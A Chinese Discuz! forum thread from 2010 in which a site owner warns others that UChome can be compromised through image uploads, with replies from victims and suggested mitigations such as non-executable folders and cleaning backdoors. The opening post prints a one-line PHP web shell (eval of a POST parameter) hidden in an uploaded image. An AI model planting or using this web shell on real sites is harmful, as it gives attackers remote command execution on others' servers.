Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[分享] UChome出漏洞,来提醒一下各位,好自为之。

[复制链接]
wuxiansj 发表于 2010-6-3 18:02:21 | 显示全部楼层 |阅读模式
本帖最后由 wuxiansj 于 2010-6-4 10:10 编辑

UChome出漏洞。可能通过上传图片 (加入一句话木马<?eval(\$_POST[cmd]);?>")?>),(传到了这里/home/attachment/)。


此漏洞是一位大牛发现(毕竟能发现康盛程序的漏洞,请允许我这么叫吧)。后来可能流出。不过知道的人并不多。我的一个uchome的站不幸遇难。
各位可以把uchome/data设置成不允许执行,试试。

特来提醒各位,好自为之。速速检查。
syq10086 发表于 2010-6-3 18:42:54 | 显示全部楼层
怎么设置,我应经打过4月6日的补丁了,你详细点说具体怎么做好吗,谢谢分享
回复

使用道具 举报

 楼主| wuxiansj 发表于 2010-6-4 09:01:57 | 显示全部楼层
回复 2# syq10086 的帖子


    我5月末才新安装的uchome。结果被人搞了。(肯定是通过uchome,我帖子中提到的方式搞的)。目前官方还没有针对此漏洞的补丁。

如果可以先暂停使用uchome先改个目录。如果不能暂停。分配好各个文件夹的权限。具体应对方法我也不太清楚。我也没有去深究具体通过哪个文件什么方式上传的。但从简单的表现上来看,是通过上传一张带有一句话木马的图片上传,然后通过某个内置文件执行(解析)了这句插入图片的一句话木马。有可能是data文件夹。这个漏洞我看了一下,还没有大规模公布。可能只是发现者的圈子人知道。所以特意来提醒一下大家。相信的话,就注意一下吧。
回复

使用道具 举报

kf2158 发表于 2010-6-4 09:05:46 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

lhafly 发表于 2010-6-4 09:21:40 | 显示全部楼层
希望官方给一个正式的说法和解决方法!
回复

使用道具 举报

bugx 发表于 2010-6-4 13:27:01 | 显示全部楼层
我的也被这么搞了。。。
回复

使用道具 举报

bugx 发表于 2010-6-4 13:35:12 | 显示全部楼层
回复 3# wuxiansj 的帖子


    我也被搞掉了
回复

使用道具 举报

 楼主| wuxiansj 发表于 2010-6-4 13:42:26 | 显示全部楼层
回复 7# bugx 的帖子


    呵呵,莫怕,能不用uchome先不用。把后门清理一下,重点留意一句话木马。能覆盖备份就覆盖备份。
回复

使用道具 举报

bugx 发表于 2010-6-4 13:51:03 | 显示全部楼层
回复 8# wuxiansj 的帖子


    用都用了。我只找到了那个木马。但是人家不是一样又可以进来了
回复

使用道具 举报

lllrrrlll 发表于 2010-6-4 14:30:03 | 显示全部楼层

这个有点恐怖……
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-25 11:58 , Processed in 0.028623 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表